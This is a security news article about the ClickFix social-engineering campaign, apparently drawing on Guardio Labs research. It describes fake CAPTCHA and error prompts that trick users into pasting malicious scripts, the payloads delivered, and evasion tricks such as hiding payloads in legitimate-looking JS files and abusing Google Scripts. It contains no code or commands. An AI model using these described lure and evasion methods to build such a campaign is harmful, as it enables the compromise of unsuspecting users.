The ClickFix campaign is rapidly reshaping the social engineering threat landscape, catching both individuals and enterprise security teams off guard. What began as an obscure technique last year has now surged more than 500% in attack volume in 2025, making it the second most common attack vector after phishing. First identified in early 2024, ClickFix tricks users into running malicious code on their own machines under the illusion of solving a fake problem, often through what looks like a CAPTCHA check.
Attackers distribute malicious instructions through fake error dialogs, browser alerts, and fraudulent software update prompts. These prompts are everywhere, from compromised websites to realistic malvertising banners and phishing emails. ClickFix uses a range of infection channels, including drive-by downloads and search engine poisoning, broadening its reach and complementing phishing and malvertising tactics.
A typical scenario involves a user encountering a pop-up that imitates a trusted brand or system warning. Instead of realizing the danger, they’re persuaded to press certain keyboard shortcuts, inadvertently copying and pasting a malicious script into their system’s terminal or Run dialog. As a result, users unknowingly initiate their own compromise.
Guardio Labs has taken a close look at the evolving ClickFix campaign and found just how adaptable it truly is. Attackers use it to deliver a range of threats, from stealers to remote access trojans to malware loaders, adjusting their tools to fit their goals. The payload portfolio also includes ransomware, cryptominers, and advanced tools for maintaining long-term access and control.
What started as an isolated tactic has quickly become a widespread problem. Now, both criminal groups and suspected state-backed actors have jumped on board, ramping up the scale of these attacks. The surge is so significant that researchers are referring to the current wave as a kind of CAPTCHAgeddon, marking how far this technique has spread and how effectively it catches its targets off guard.
What makes ClickFix stand out is its quiet operation and ability to adapt quickly. Rather than pushing obvious downloads or using loud warning pop-ups, it leans on believable stories and carefully crafted user prompts. While older schemes like ClearFake tricked users with bogus browser update notices hosted on hacked WordPress sites, ClickFix slips past defenses more subtly, making it harder to spot. ClickFix is no longer limited to Windows; infections have also been documented on macOS and Linux, indicating a broad cross-platform threat.
ClickFix evolved from earlier scams like ClearFake by removing reliance on file downloads and adopting more persuasive narratives combined with advanced evasion methods. Attackers hide payloads in legitimate-looking JS files like socket.io.min.js and abuse trusted platforms such as Google Scripts to host fake CAPTCHA flows, lending credibility and evading detection.
As Guardio Lab points out, this isn’t just an evolution of phishing. Behind the scenes, a deliberate effort is being made to obfuscate payloads, utilize dynamic loading, target cross-platform, and leverage trusted infrastructure. These measures make the campaign harder to detect and far more persistent than its predecessors.
